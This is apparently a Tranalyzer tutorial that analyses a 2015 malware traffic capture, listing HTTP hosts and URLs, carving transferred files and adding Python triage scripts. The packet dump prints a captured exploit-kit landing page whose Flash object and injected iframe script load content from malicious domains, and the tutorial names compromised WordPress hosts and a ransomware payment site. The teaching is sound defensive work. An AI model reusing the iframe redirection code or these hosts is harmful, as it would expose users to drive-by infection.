B     16       0x0400000000004001  1431031903.188176000  1431031903.341751000  0.153575000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           62.75.195.236    il       "Not allocated by APNIC"          80       192.168.138.158  07       "Private network"                 49196    6        0x02             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "__51424ddd486ff06861fceed24e86b329_16_B_1_0"                                                                                                                                                                                                                                                                                                 "Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6"  "PHP/5.3.3"
A     22       0x0400000000004000  1431031905.650875000  1431031905.834393000  0.183518000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49199    204.152.254.221  us       "Brinkster Communications Corpo"  80       6        0x02             0x006c    0x0001      0x08         0x0001         0x0010      0_1           0                      1_0_0_0_0_1_0_0_0_1                          0_0_0_0_0_1_0                    "runlove.us"                       "/wp-content/themes/twentyfifteen/img5.php?l=8r1gf1b2t1kuq42"  "application/x-www-form-urlencoded"                                                                                                                                                                                                                 "_wp-content_themes_twentyfifteen_img5.php_l=8r1gf1b2t1kuq42_22_A_1_0"                                                                                                "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"                                                                                                                                  
B     22       0x0400000000004001  1431031905.709435000  1431031905.834454000  0.125019000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           204.152.254.221  us       "Brinkster Communications Corpo"  80       192.168.138.158  07       "Private network"                 49199    6        0x02             0x0068    0x0000      0x00         0x0040         0x0010      0_0           1          404         0_0_0_1_0_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_wp-content_themes_twentyfifteen_img5.php_l=8r1gf1b2t1kuq42_22_B_1_0"                                                                                                                                                                                                                                                                        "Apache"                                          
A     24       0x0400000000004000  1431031908.613660000  1431031908.779062000  0.165402000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49201    204.152.254.221  us       "Brinkster Communications Corpo"  80       6        0x02             0x006c    0x0001      0x08         0x0001         0x0010      0_1           0                      1_0_0_0_0_1_0_0_0_1                          0_0_0_0_0_1_0                    "runlove.us"                       "/wp-content/themes/twentyfifteen/img5.php?u=mfymi71rapdzk"    "application/x-www-form-urlencoded"                                                                                                                                                                                                                 "_wp-content_themes_twentyfifteen_img5.php_u=mfymi71rapdzk_24_A_1_0"                                                                                                  "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"                                                                                                                                  
B     24       0x0400000000004001  1431031908.667116000  1431031908.779106000  0.111990000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           204.152.254.221  us       "Brinkster Communications Corpo"  80       192.168.138.158  07       "Private network"                 49201    6        0x02             0x0068    0x0000      0x00         0x0040         0x0010      0_0           1          404         0_0_0_1_0_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_wp-content_themes_twentyfifteen_img5.php_u=mfymi71rapdzk_24_B_1_0"                                                                                                                                                                                                                                                                          "Apache"                                          
A     25       0x0400000000004000  1431031908.780729000  1431031912.367847000  3.587118000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49202    72.34.49.86      us       "IHNetworks"                      80       6        0x02             0x006c    0x0001      0x08         0x0001         0x0010      0_1           0                      1_0_0_0_0_1_0_0_0_1                          0_0_0_0_0_1_0                    "comarksecurity.com"               "/wp-content/themes/grizzly/img5.php?u=mfymi71rapdzk"          "application/x-www-form-urlencoded"                                                                                                                                                                                                                 "_wp-content_themes_grizzly_img5.php_u=mfymi71rapdzk_25_A_1_0"                                                                                                        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"                                                                                                                                  
B     25       0x0400000000004001  1431031908.886579000  1431031912.367927000  3.481348000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           72.34.49.86      us       "IHNetworks"                      80       192.168.138.158  07       "Private network"                 49202    6        0x02             0x0078    0x0000      0x00         0x0040         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_wp-content_themes_grizzly_img5.php_u=mfymi71rapdzk_25_B_1_0"                                                                                                                                                                                                                                                                                "Apache"                                          "PHP/5.3.29"
A     26       0x0400000000004000  1431031914.993554000  1431031915.185509000  0.191955000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49203    204.152.254.221  us       "Brinkster Communications Corpo"  80       6        0x02             0x006c    0x0001      0x08         0x0001         0x0010      0_1           0                      1_0_0_0_0_1_0_0_0_1                          0_0_0_0_0_1_0                    "runlove.us"                       "/wp-content/themes/twentyfifteen/img5.php?f=ka6nnuvccqlw9"    "application/x-www-form-urlencoded"                                                                                                                                                                                                                 "_wp-content_themes_twentyfifteen_img5.php_f=ka6nnuvccqlw9_26_A_1_0"                                                                                                  "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"                                                                                                                                  
B     26       0x0400000000004001  1431031915.035444000  1431031915.185568000  0.150124000   1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           204.152.254.221  us       "Brinkster Communications Corpo"  80       192.168.138.158  07       "Private network"                 49203    6        0x02             0x0068    0x0000      0x00         0x0040         0x0010      0_0           1          404         0_0_0_1_0_0_0_0_0_1                          0_0_0_0_1_0_0                                                                                                                      "text/html"                                                                                                                                                                                                                                                                                                                 "_wp-content_themes_twentyfifteen_img5.php_f=ka6nnuvccqlw9_26_B_1_0"                                                                                                                                                                                                                                                                          "Apache"                                          
A     33       0x0400000000004000  1431031945.999417000  1431032021.842696000  75.843279000  1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           192.168.138.158  07       "Private network"                 49209    95.163.121.204   ru       "Digital Network JSC"             80       6        0x42             0x006c    0x0000      0x0a         0x0001         0x0010      1_1           0                      2_0_0_0_0_1_0_1_2_1                          0_0_0_0_0_1_0                    "7oqnsnzwwnm6zb7y.gigapaysun.com"  "/img/flags/de.png";"/11iQmfg"                                 "application/x-www-form-urlencoded"     "PHPSESSID=uqq1670l1pkd07vgdnsg98dee5";"PHPSESSID=uqq1670l1pkd07vgdnsg98dee5"                                                                                                                               "_11iQmfg_33_A_2_0"                                                                                                                                                   "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"            "http://7oqnsnzwwnm6zb7y.gigapaysun.com/11iQmfg"                                                                      
B     33       0x0400000000004001  1431031946.199749000  1431031957.906658000  11.706909000  1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           95.163.121.204   ru       "Digital Network JSC"             80       192.168.138.158  07       "Private network"                 49209    6        0x02             0x0078    0x0000      0x00         0x0044         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_2                          1_0_0_0_1_0_0                                                                                                                      "image/png";"text/html"                                                                                                "_img_flags_de.png_33_B_1_0"                                                                                                                                                                         "_11iQmfg_33_B_2_0"                                                                                                                                                                                                                                                                                                                           "nginx/1.2.1"                                     "PHP/5.4.39-0+deb7u2"
B     30       0x0400000000004001  1431031944.192640000  1431031960.017404000  15.824764000  1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           95.163.121.204   ru       "Digital Network JSC"             80       192.168.138.158  07       "Private network"                 49206    6        0x02             0x0068    0x0000      0x00         0x0044         0x0010      0_0           2          200;304     0_0_0_1_0_0_0_0_0_2                          2_0_0_0_1_0_0                                                                                                                      "text/css";"image/png"                                                                                                 "_img_flags_it.png_30_B_5_0";"_img_flags_fr.png_30_B_6_1"                                                                                                                                            "_img_style.css_30_B_1_0"                                                                                                                                                                                                                                                                                                                     "nginx/1.2.1"                                     
B     29       0x0400000000004001  1431031941.537441000  1431031962.048801000  20.511360000  1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           95.163.121.204   ru       "Digital Network JSC"             80       192.168.138.158  07       "Private network"                 49205    6        0x02             0x0068    0x0000      0x00         0x0044         0x0010      0_0           1          200         0_0_0_1_1_0_0_0_0_2                          3_0_0_0_1_0_0                                                                                                                      "text/html";"image/png"                                                                                                "_img_flags_us.png_29_B_3_0";"_img_rt.png_29_B_4_1";"_img_bitcoin.png_29_B_5_2"                                                                                                                      "_11iQmfg_29_B_1_0"                                                                                                                                                                                                                                                                                                                           "nginx/1.2.1"                                     "PHP/5.4.39-0+deb7u2"
B     34       0x0400000000004001  1431031946.186402000  1431031962.095257000  15.908855000  1           3        eth:ipv4:tcp  00:00:00:00:00:00  00:00:00:00:00:00  0x0800           95.163.121.204   ru       "Digital Network JSC"             80       192.168.138.158  07       "Private network"                 49210    6        0x02             0x0068    0x0000      0x00         0x0004         0x0010      0_0           1          200         0_0_0_1_0_0_0_0_0_1                          3_0_0_0_0_0_0                                                                                                                      "image/png"                                                                                                            "_img_lt.png_34_B_1_0";"_img_lb.png_34_B_2_1";"_img_button_pay.png_34_B_3_2"                                                                                                                                                                                                                                                                                                                                                                                                                                                                       "nginx/1.2.1"

Now you can see all the HTTP commands being exchanged, including content names and files. Yes, really fishy. To see which URLs were requested from which host:

tawk -H '{ print $httpHosts, $httpURL }' ~/results/2015-05-08-traffic-analysis-exercise_flows.txt | sort | tcol

"62.75.195.236"                                                                  "/?34eaf8bd50d85d8c6baacb45f0a7b22e"
"62.75.195.236"                                                                  "/?3a08b0be8322c244f5a1cb9c1057d941"
"62.75.195.236"                                                                  "/?51424ddd486ff06861fceed24e86b329"
"62.75.195.236"                                                                  "/?60dbe33b908e0086292196ef001816bc"
"62.75.195.236"                                                                  "/aa25f5fe2875e3d0a244e6969e589cc4"
"62.75.195.236"                                                                  "/?b2566564b3ba1a38e61c83957a7dbcd5"
"62.75.195.236"                                                                  "/?b514ee6f0fe486009a6d83b035a4c0bd"
"62.75.195.236"                                                                  "/?d71e0bd86db9587158745a986a4b3606"
"7oqnsnzwwnm6zb7y.gigapaysun.com"                                                "/11iQmfg";"/img/flags/us.png";"/img/rt.png";"/img/bitcoin.png"
"7oqnsnzwwnm6zb7y.gigapaysun.com"                                                "/img/flags/de.png";"/11iQmfg"
"7oqnsnzwwnm6zb7y.gigapaysun.com"                                                "/img/flags/es.png";"/favicon.ico"
"7oqnsnzwwnm6zb7y.gigapaysun.com"                                                "/img/lt.png";"/img/lb.png";"/img/button_pay.png"
"7oqnsnzwwnm6zb7y.gigapaysun.com"                                                "/img/style.css";"/img/flags/it.png";"/img/flags/fr.png"
"7oqnsnzwwnm6zb7y.gigapaysun.com"                                                "/picture.php?k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764";"/img/rb.png"
"comarksecurity.com"                                                             "/wp-content/themes/grizzly/img5.php?c=cdcnw7cfz43rmtg"
"comarksecurity.com"                                                             "/wp-content/themes/grizzly/img5.php?t=8r1gf1b2t1kuq42"
"comarksecurity.com"                                                             "/wp-content/themes/grizzly/img5.php?u=ka6nnuvccqlw9"
"comarksecurity.com"                                                             "/wp-content/themes/grizzly/img5.php?u=mfymi71rapdzk"
"ip-addr.es"                                                                     "/"
"r03afd2.c3008e.xc07r.b0f.a39.h7f0fa5eu.vb8fbl.e8mfzdgrf7g0.groupprograms.in"    "/"
"runlove.us"                                                                     "/wp-content/themes/twentyfifteen/img5.php?f=ka6nnuvccqlw9"
"runlove.us"                                                                     "/wp-content/themes/twentyfifteen/img5.php?l=8r1gf1b2t1kuq42"
"runlove.us"                                                                     "/wp-content/themes/twentyfifteen/img5.php?t=cdcnw7cfz43rmtg"
"runlove.us"                                                                     "/wp-content/themes/twentyfifteen/img5.php?u=mfymi71rapdzk"
"ubb67.3c147o.u806a4.w07d919.o5f.f1.b80w.r0faf9.e8mfzdgrf7g0.groupprograms.in"   "/"
"va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc.e8mfzdgrf7g0.groupprograms.in"  "/?285a4d4e4e5a4d4d4649584c5d43064b4745"

Look at the hosts and the URLs. That is malware.

The command and its output can be simplified further by using one of tawk's example functions, namely httpHostsURL():

tawk -e 'httpHostsURL()' ~/results/2015-05-08-traffic-analysis-exercise_flows.txt

62.75.195.236
	/?34eaf8bd50d85d8c6baacb45f0a7b22e
	/?3a08b0be8322c244f5a1cb9c1057d941
	/?51424ddd486ff06861fceed24e86b329
	/?60dbe33b908e0086292196ef001816bc
	/?b2566564b3ba1a38e61c83957a7dbcd5
	/?b514ee6f0fe486009a6d83b035a4c0bd
	/?d71e0bd86db9587158745a986a4b3606
	/aa25f5fe2875e3d0a244e6969e589cc4

7oqnsnzwwnm6zb7y.gigapaysun.com
	/11iQmfg
	/favicon.ico
	/img/bitcoin.png
	/img/button_pay.png
	/img/flags/de.png
	/img/flags/es.png
	/img/flags/fr.png
	/img/flags/it.png
	/img/flags/us.png
	/img/lb.png
	/img/lt.png
	/img/rb.png
	/img/rt.png
	/img/style.css
	/picture.php?k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764

comarksecurity.com
	/wp-content/themes/grizzly/img5.php?c=cdcnw7cfz43rmtg
	/wp-content/themes/grizzly/img5.php?t=8r1gf1b2t1kuq42
	/wp-content/themes/grizzly/img5.php?u=ka6nnuvccqlw9
	/wp-content/themes/grizzly/img5.php?u=mfymi71rapdzk

ip-addr.es
	/

r03afd2.c3008e.xc07r.b0f.a39.h7f0fa5eu.vb8fbl.e8mfzdgrf7g0.groupprograms.in
	/

runlove.us
	/wp-content/themes/twentyfifteen/img5.php?f=ka6nnuvccqlw9
	/wp-content/themes/twentyfifteen/img5.php?l=8r1gf1b2t1kuq42
	/wp-content/themes/twentyfifteen/img5.php?t=cdcnw7cfz43rmtg
	/wp-content/themes/twentyfifteen/img5.php?u=mfymi71rapdzk

ubb67.3c147o.u806a4.w07d919.o5f.f1.b80w.r0faf9.e8mfzdgrf7g0.groupprograms.in
	/

va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc.e8mfzdgrf7g0.groupprograms.in
	/?285a4d4e4e5a4d4d4649584c5d43064b4745
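
The traits that make this host/URL list stand out can also be checked mechanically. The following Python is an added example, not part of the original tutorial or of Tranalyzer: it parses the two-column `$httpHosts, $httpURL` output shown earlier, groups URLs per host, and flags each host. The function names, flag labels and thresholds (more than 6 host labels, a query made only of 16 or more hex digits) are assumptions chosen for this capture.

```python
import ipaddress
import re
from collections import defaultdict

# Rows copied from the "tawk -H '{ print $httpHosts, $httpURL }' ... | tcol"
# output above (column padding shortened).
SAMPLE = r'''
"62.75.195.236"    "/?34eaf8bd50d85d8c6baacb45f0a7b22e"
"7oqnsnzwwnm6zb7y.gigapaysun.com"    "/img/flags/de.png";"/11iQmfg"
"comarksecurity.com"    "/wp-content/themes/grizzly/img5.php?u=mfymi71rapdzk"
"ip-addr.es"    "/"
"runlove.us"    "/wp-content/themes/twentyfifteen/img5.php?u=mfymi71rapdzk"
"va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc.e8mfzdgrf7g0.groupprograms.in"  "/?285a4d4e4e5a4d4d4649584c5d43064b4745"
'''

# Assumed thresholds, tune them for your own traffic.
MAX_LABELS = 6                                   # dot-separated host labels
HEX_QUERY = re.compile(r"[0-9a-f]{16,}", re.I)   # query that is only hex digits

# One column holds repeated values: "a";"b";"c" (no spaces between them).
FIELD = re.compile(r'"[^"]*"(?:;"[^"]*")*')
VALUE = re.compile(r'"([^"]*)"')


def parse_rows(text):
    """Yield (hosts, urls) per flow row; each is the list of repeated values."""
    for line in text.splitlines():
        fields = FIELD.findall(line)
        if len(fields) != 2:
            continue  # blank line, header, or a flow lacking host or URL
        yield VALUE.findall(fields[0]), VALUE.findall(fields[1])


def group_by_host(text):
    """Return {host: sorted unique URLs}, merging all flows of a host."""
    grouped = defaultdict(set)
    for hosts, urls in parse_rows(text):
        for host in hosts:
            grouped[host].update(urls)
    return {h: sorted(u) for h, u in sorted(grouped.items())}


def is_ip_literal(host):
    """True if the Host header is a bare IP address instead of a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def triage(text):
    """Return {host: sorted flags} for hosts matching at least one heuristic."""
    findings = defaultdict(set)
    script_hosts = defaultdict(set)      # script file name -> hosts serving it
    for host, urls in group_by_host(text).items():
        if is_ip_literal(host):
            findings[host].add("ip-literal-host")
        elif host.count(".") + 1 > MAX_LABELS:
            findings[host].add("many-labels")
        for url in urls:
            path, _, query = url.partition("?")
            if HEX_QUERY.fullmatch(query):
                findings[host].add("hex-only-query")
            name = path.rsplit("/", 1)[-1]
            if name.endswith(".php"):
                script_hosts[name].add(host)
    # The same script name requested on unrelated hosts is worth a look.
    for name, hosts in script_hosts.items():
        if len(hosts) > 1:
            for host in hosts:
                findings[host].add("shared-script:" + name)
    return {h: sorted(f) for h, f in sorted(findings.items())}


if __name__ == "__main__":
    for host, flags in triage(SAMPLE).items():
        print(host, ", ".join(flags), sep="\t")
```

A flag is a reason to inspect the flow, not a verdict: `ip-addr.es` and the `gigapaysun.com` host pass these three checks even though they belong to the same capture.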

In the packet file you can see the complete payload in its original form:

tcol ~/results/2015-05-08-traffic-analysis-exercise_packets.txt

%pktNo  flowInd  flowStat            time                  pktIAT        pktTrip       flowDuration  numHdrs  hdrDesc       vlanID  srcMac             dstMac             ethType  srcIP            srcIPCC  srcIPOrg                        srcPort  dstIP            dstIPCC  dstIPOrg                        dstPort  l4Proto  tcpStatesAFlags  httpStat  httpAFlags  httpMethods  httpHeadMimes  httpCFlags  l7Content
1       1        0x0400000000004000  1431031896.723375000  0.000000000   0.000000000   0.000000000   3        eth:ipv4:udp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   192.168.138.158  07       Private network                 60078    192.168.138.2    07       Private network                 53       17       0x00             0x0000    0x0000      0x00         0x0000         0x0010      G............va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc\fe8mfzdgrf7g0\rgroupprograms.in.....
2       1        0x0400000000004001  1431031896.874326000  0.000000000   0.150951040   0.000000000   3        eth:ipv4:udp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   192.168.138.2    07       Private network                 53       192.168.138.158  07       Private network                 60078    17       0x00             0x0000    0x0000      0x00         0x0000         0x0010      G............va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc\fe8mfzdgrf7g0\rgroupprograms.in......\f..........>K..
3       2        0x0400000000004000  1431031896.958320000  0.000000000   0.000000000   0.000000000   3        eth:ipv4:tcp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   192.168.138.158  07       Private network                 49184    62.75.195.236    il       Not allocated by APNIC          80       6        0x00             0x0000    0x0000      0x00         0x0000         0x0010      
4       2        0x0400000000004001  1431031897.090353000  0.000000000   0.132033024   0.000000000   3        eth:ipv4:tcp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   62.75.195.236    il       Not allocated by APNIC          80       192.168.138.158  07       Private network                 49184    6        0x00             0x0000    0x0000      0x00         0x0000         0x0010      
5       2        0x0400000000004000  1431031897.090448000  0.132128000   0.000095000   0.132128000   3        eth:ipv4:tcp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   192.168.138.158  07       Private network                 49184    62.75.195.236    il       Not allocated by APNIC          80       6        0x00             0x0000    0x0000      0x00         0x0000         0x0010      
6       2        0x0400000000004000  1431031897.091322000  0.000874000   0.000969000   0.133002000   3        eth:ipv4:tcp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   192.168.138.158  07       Private network                 49184    62.75.195.236    il       Not allocated by APNIC          80       6        0x00             0x002c    0x0000      0x02         0x0000         0x0010      GET /?285a4d4e4e5a4d4d4649584c5d43064b4745 HTTP/1.1\r\nAccept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nAccept-Encoding: gzip, deflate\r\nHost: va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc.e8mfzdgrf7g0.groupprograms.in\r\nConnection: Keep-Alive\r\n\r\n
7       2        0x0400000000004001  1431031897.091382000  0.001029000   0.000060000   0.001029000   3        eth:ipv4:tcp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   62.75.195.236    il       Not allocated by APNIC          80       192.168.138.158  07       Private network                 49184    6        0x00             0x0000    0x0000      0x00         0x0000         0x0010      
8       2        0x0400000000004001  1431031897.453906000  0.362524000   0.362584000   0.363553000   3        eth:ipv4:tcp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   62.75.195.236    il       Not allocated by APNIC          80       192.168.138.158  07       Private network                 49184    6        0x00             0x0028    0x0000      0x00         0x0040         0x0010      HTTP/1.1 200 OK\r\nDate: Thu, 07 May 2015 20:51:34 GMT\r\nServer: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6\r\nX-Powered-By: PHP/5.3.3\r\nContent-Length: 560\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n<html><body><object type="application/x-shockwave-flash" allowScriptAccess="always" width="434" height="449"><param name="movie" value="http://ubb67.3c147o.u806a4.w07d919.o5f.f1.b80w.r0faf9.e8mfzdgrf7g0.groupprograms.in/"><param name="play" value="true"></object><script>var fhxa45 = document.createElement('if'+'rame');fhxa45.setAttribute('src', 'http://r03afd2.c3008e.xc07r.b0f.a39.h7f0fa5eu.vb8fbl.e8mfzdgrf7g0.groupprograms.in/');fhxa45.setAttribute('width', 434);fhxa45.setAttribute('height', 449);document.body.appendChild(fhxa45);</script></body></html>
9       2        0x0400000000004000  1431031897.454085000  0.362763000   0.000179008   0.495765000   3        eth:ipv4:tcp          00:00:00:00:00:00  00:00:00:00:00:00  0x0800   192.168.138.158  07       Private network                 49184    62.75.195.236    il       Not allocated by APNIC          80       6        0x00             0x002c    0x0000      0x02         0x0000         0x0010
...

Data carving with httpSniffer

Now we want to extract the content. Set HTTP_SAVE_IMAGE, HTTP_SAVE_TEXT and HTTP_SAVE_APPL to 1 in httpSniffer.h, recompile httpSniffer and rerun t2.

t2conf httpSniffer -D HTTP_SAVE_IMAGE=1 -D HTTP_SAVE_TEXT=1 -D HTTP_SAVE_APPL=1 && t2build httpSniffer

t2 -r ~/data/2015-05-08-traffic-analysis-exercise.pcap -w ~/results

...
--------------------------------------------------------------------------------
tcpStates: Aggregated tcpStatesAFlags=0x42
httpSniffer: Aggregated httpStat=0xc53c
httpSniffer: Aggregated httpAFlags=0x1113
httpSniffer: Aggregated httpCFlags=0x0010
httpSniffer: Aggregated httpHeadMimes=0x0045
httpSniffer: Number of files img_vid_aud_msg_txt_app_unk: 13_0_0_0_22_10_0
httpSniffer: Max number of file handles: 7
httpSniffer: Number of HTTP packets: 399 [52.43%]
httpSniffer: Number of HTTP GET  requests: 28 [7.02%]
httpSniffer: Number of HTTP POST requests: 9 [2.26%]
httpSniffer: HTTP GET/POST ratio: 3.11
--------------------------------------------------------------------------------
...

The 2nd line in the httpSniffer end report indicates that 7 files are extracted.

tawk -V httpStat=0xc53c -V httpAFlags=0x1113 -V httpCFlags=0x0010 -V httpHeadMimes=0x0045

The httpStat column with value 0xc53c is to be interpreted as follows:

   bit | httpStat | Description
   =============================================================================
     2 | 0x0004   | Internal state: pending URL name
     3 | 0x0008   | HTTP flow
     4 | 0x0010   | Internal state: Chunked transfer
     5 | 0x0020   | Internal state: HTTP flow detected
     8 | 0x0100   | Internal state: header shift
    10 | 0x0400   | Internal state: image payload sniffing
    14 | 0x4000   | Internal state: text payload sniffing
    15 | 0x8000   | Internal state: application payload sniffing


The httpAFlags column with value 0x1113 is to be interpreted as follows:

   bit | httpAFlags | Description
   =============================================================================
     0 | 0x0001     | POST query with parameters
     1 | 0x0002     | Host is IPv4, e.g., Host: 1.2.3.4
     4 | 0x0010     | Sequence number violation
     8 | 0x0100     | X-Site Scripting protection
    12 | 0x1000     | Possible EXE download


The httpCFlags column with value 0x0010 is to be interpreted as follows:

   bit | httpCFlags | Description
   =============================================================================
     4 | 0x0010     | Potential HTTP content


The httpHeadMimes column with value 0x0045 is to be interpreted as follows:

   bit | httpHeadMimes | Description
   =============================================================================
     0 | 0x0001        | Application
     2 | 0x0004        | Image
     6 | 0x0040        | Text

Now look into /tmp/:

ls /tmp

httpAppl        httpPicture     httpText        ...

Look into /tmp/httpPicture:

ls /tmp/httpPicture

_favicon.ico_1_31_2_1       _img_button_pay.png_1_34_3_2   _img_flags_es.png_1_31_1_0   _img_flags_it.png_1_30_5_0   _img_lb.png_1_34_2_1   _img_rb.png_1_32_3_1  '_picture.php_k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764_1_32_1_0'
_img_bitcoin.png_1_29_5_2   _img_flags_de.png_1_33_1_0     _img_flags_fr.png_1_30_6_1   _img_flags_us.png_1_29_3_0   _img_lt.png_1_34_1_0   _img_rt.png_1_29_4_1

Each file is linked directly to its flow through the encoding of its name:

Filename_Flow-Dir(0/1)_findex_#Packet-in-Flow_#Mimetype-in-Flow

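Open the pictures with your file browser or with an image viewer (eog, feh, …), as you wish. Be careful with the application folder (httpAppl): httpAFlags above reports a possible EXE download, so examine those files without executing them.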
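The naming scheme above can be parsed mechanically to tie every carved file back to its flow, and the files can be identified by hash and leading bytes without opening them in a viewer. The script below is an added example, not part of Tranalyzer or of the original tutorial; the function names, the magic-number list and the RISKY set are this example's own, and it assumes that findex is the flow index (flowInd in the output above).

```python
import hashlib
import re
from pathlib import Path

# Filename_Flow-Dir(0/1)_findex_#Packet-in-Flow_#Mimetype-in-Flow. The name part
# contains underscores itself, so the four numeric fields are anchored at the end.
CARVED = re.compile(
    r"^(?P<name>.*)_(?P<dir>[01])_(?P<findex>\d+)_(?P<pkt>\d+)_(?P<mime>\d+)$")
# Well-known magic numbers (illustrative selection, not exhaustive).
MAGIC = [
    (b"MZ", "pe-executable"), (b"\x7fELF", "elf-executable"),
    (b"FWS", "flash"), (b"CWS", "flash"), (b"ZWS", "flash"),
    (b"PK\x03\x04", "zip"), (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"), (b"GIF8", "gif"), (b"\x00\x00\x01\x00", "ico"),
]
RISKY = {"pe-executable", "elf-executable", "flash", "zip"}  # assumption: isolate these

def parse_carved_name(filename):
    """Split a carved file name into its flow coordinates, or return None."""
    m = CARVED.match(filename)
    if m is None:
        return None
    row = {k: int(v) for k, v in m.groupdict().items() if k != "name"}
    row["name"] = m["name"]
    return row

def sniff(head):
    """Classify content by its leading bytes, not by file name or folder."""
    return next((kind for magic, kind in MAGIC if head.startswith(magic)), "unknown")

def triage(directory):
    """Inventory one output folder; files are only read, never viewed or run."""
    rows = []
    for path in sorted(Path(directory).iterdir()):
        row = parse_carved_name(path.name)
        if row is None or not path.is_file():
            continue
        data = path.read_bytes()
        kind = sniff(data[:16])
        row.update(sha256=hashlib.sha256(data).hexdigest(), kind=kind, risky=kind in RISKY)
        rows.append(row)
    return rows

if __name__ == "__main__":
    for folder in ("/tmp/httpPicture", "/tmp/httpText", "/tmp/httpAppl"):
        if Path(folder).is_dir():
            for r in triage(folder):
                print(folder, r["findex"], r["dir"], r["pkt"], r["kind"],
                      "RISKY" if r["risky"] else "-", r["sha256"], r["name"], sep="\t")
```

A file in httpPicture whose kind is not an image type, or any row marked RISKY, is worth looking up by its findex in the flow file before anything else is done with it.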

Conclusion

Don’t forget to reset the plugin configuration for the next tutorial.

t2conf httpSniffer --reset && t2build httpSniffer

Have fun analyzing HTTP traffic!